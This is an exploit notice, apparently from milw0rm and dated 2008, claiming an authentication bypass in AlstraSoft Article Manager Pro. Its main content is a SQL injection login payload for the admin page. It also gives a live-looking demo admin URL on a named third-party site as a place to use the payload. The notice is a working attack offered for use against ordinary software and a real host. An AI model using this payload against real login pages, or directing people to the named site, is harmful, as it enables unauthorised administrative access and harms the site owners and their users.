46 lines
No EOL
902 B
Text
46 lines
No EOL
902 B
Text
[~] AlstraSoft Article Manager Pro auth bypass
|
|
[~]
|
|
[~] ----------------------------------------------------------
|
|
[~] Discovered By: ZoRLu
|
|
[~]
|
|
[~] Date: 12.11.2008
|
|
[~]
|
|
[~] Home: www.z0rlu.blogspot.com
|
|
[~]
|
|
[~] contact: trt-turk@hotmail.com
|
|
[~]
|
|
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
|
|
[~]
|
|
[~] my bug number now: 36
|
|
[~]
|
|
[~] my target bug number: 100
|
|
[~]
|
|
[~] -----------------------------------------------------------
|
|
|
|
|
|
Exploit:
|
|
|
|
localhost/script/admin/admin.php
|
|
|
|
username: ' or ' 1=1--
|
|
|
|
password: ZoRLu
|
|
|
|
|
|
|
|
admin login for demo:
|
|
|
|
http://www.blizsoft.com/article/admin/admin.php
|
|
|
|
username: ' or ' 1=1--
|
|
|
|
password: ZoRLu
|
|
|
|
[~]----------------------------------------------------------------------
|
|
[~] Greetz tO: str0ke & all Muslim HaCkeRs
|
|
[~]
|
|
[~] yildirimordulari.org & darkc0de.com
|
|
[~]
|
|
[~]----------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-11-12] |